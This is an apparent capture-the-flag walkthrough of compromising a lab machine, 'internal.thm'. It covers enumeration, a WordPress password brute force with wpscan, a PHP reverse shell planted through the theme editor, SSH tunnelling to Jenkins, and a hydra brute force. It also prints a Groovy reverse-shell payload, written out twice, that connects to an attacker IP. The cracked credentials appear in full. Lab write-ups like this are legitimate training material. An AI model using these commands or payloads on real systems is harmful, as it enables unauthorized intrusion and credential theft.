Target IP: 10.10.189.232
Challenge Description:
Performing a port scan using the command sudo nmap -sS 10.10.189.232 -p- -Pn returns the result shown above. By the looks of it, there are two TCP ports open on the target machine: SSH and HTTP on their standard ports.
Running an aggressive port scan using the command sudo nmap -sV -A 10.10.189.232 -p 22,80 against the target machine returns the result shown above. There is a web application running on the target machine. However, at the moment, the default Apache webpage is being served by the looks of it. I will start my enumeration at HTTP first.
Port 80: HTTP
The default Apache webpage, shown above, is returned to me when I visit this port by a web browser. I scanned the source-code of this webpage but I did not find anything useful. Time to perform a directory search.
I performed a directory search using the command gobuster dir -u http://10.10.189.232/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt and obtained the result shown above. There are multiple interesting entries such as /blog, /phpmyadmin, and /wordpress. I will start enumerating the /blog application first.
Visiting the /blog shows the messy webpage above. It is a WordPress website.
Reading through the source-code of the webpage shows its hostname is internal.thm, as shown above. I will insert this hostname inside my /etc/hosts file now.
After inserting the hostname inside my /etc/hosts file, the blog webpage is usable as shown above. I did some manual enumeration and found the user admin. I tried to login using the default credentials, and others such as admin:admin and admin:root, but I had no luck. Time to enumerate further using wpscan. I tried to identify any vulnerable plugins using the command wpscan --url http://internal.thm/wordpress/ --enumerate ap --plugins-detection aggressive, but I had no luck. The only attack vector I have left now is to bruteforce the password of the user admin using wpscan.
To accomplish the password bruteforcing of the user admin, I used the command wpscan --url http://internal.thm/blog/ -P /usr/share/wordlists/rockyou.txt and got a hit! The user admin is using the password my2boys by the looks of it, as shown above.
I browsed to http://internal.thm/blog/wp-login.php to login as the user admin. And bingo! After logging in successfully, the admin dashboard shown above was presented to me. Now I have access to the WordPress application as the admin. Time to enumerate further now. After digging around, I notice I can customise the themes; therefore, I can upload a PHP reverse shell to obtain a reverse shell connection.
I uploaded a copy of the PHP Pentest Monkey and replaced the 404.php file in the twentyseventeen theme, as shown above. Then I started a listener on my machine at port 8443. Time to invoke the reverse shell connection!
And bingo! I browsed to http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php to invoke the reverse shell. Now I have a reverse shell connection with the session as www-data on my machine at port 8443, as shown above.
I viewed the wp-config.php file and obtained the credentials wordpress:wordpress123 of the MySQL database, as shown above. However, I did not find anything when I viewed the database tables.
I transferred linpeas to the target machine and executed it, but I had no luck. After some manual enumeration, I found an interesting file called wp-save.txt at /opt as shown above. Now I have the password bubb13guM!@#123 which belongs to the user aubreanna. Can I switch to this user and escalate my privileges?
And bingo! Using su, I was able to switch to the user aubreanna by entering the password bubb13guM!@#123. I successfully elevated my privileges horizontally to the user aubreanna, as shown above. Time for further enumeration as this new user.
Inside the home directory of user aubreanna, I notice there is an interesting file called jenkins.txt. The content of this text file is shown above. By the looks of it, there is Jenkins running internally on port 8080.
And bingo! Running the command ss -ntplu proves true. There is a service running on port 8080. I can use SSH tunneling to expose this service outside the internal network, so I connect to this internal service from my machine. I also have the password of the user aubreanna.
On my machine, I opened a new shell and entered the command ssh -L 4444:172.17.0.2:8080 aubreanna@internal.thm and the password bubb13guM!@#123 to perform SSH tunneling as shown above. Now I should be able to access the internal service on my machine at port 4444.
And bingo! Now I have access to the internal Jenkins service from my machine at port 4444. I tried to login with default credentials, but I had no luck. Seems like bruteforcing is the attack vector left for me. I tried to login with the credentials I found previously, but I had no luck. However, using hydra and the command hydra -l admin -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt localhost -s 4444 http-form-post "/login?from=%2F:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -I, I managed to obtain the password spongebob for the user admin. After logging in successfully, I notice the Script Console is enabled. Therefore, I can obtain a reverse shell connection using this feature.
I started a listener on my machine at port 8444. Then I deployed the following code inside the Script Console:
String host="10.14.55.153";
int port=8444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();String host="10.14.55.153";
int port=8444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
And bingo! Now I have a reverse shell connection with the session as jenkins, as shown above.
Now I have the password of the user root. I located this note.txt file at /opt. Time to access the root shell :)
Using the command ssh root@internal.thm and the new password tr0ub13guM!@#123, I managed to obtain a root shell. Now I have root access on the target machine, as shown above :)
The two flags are shown above.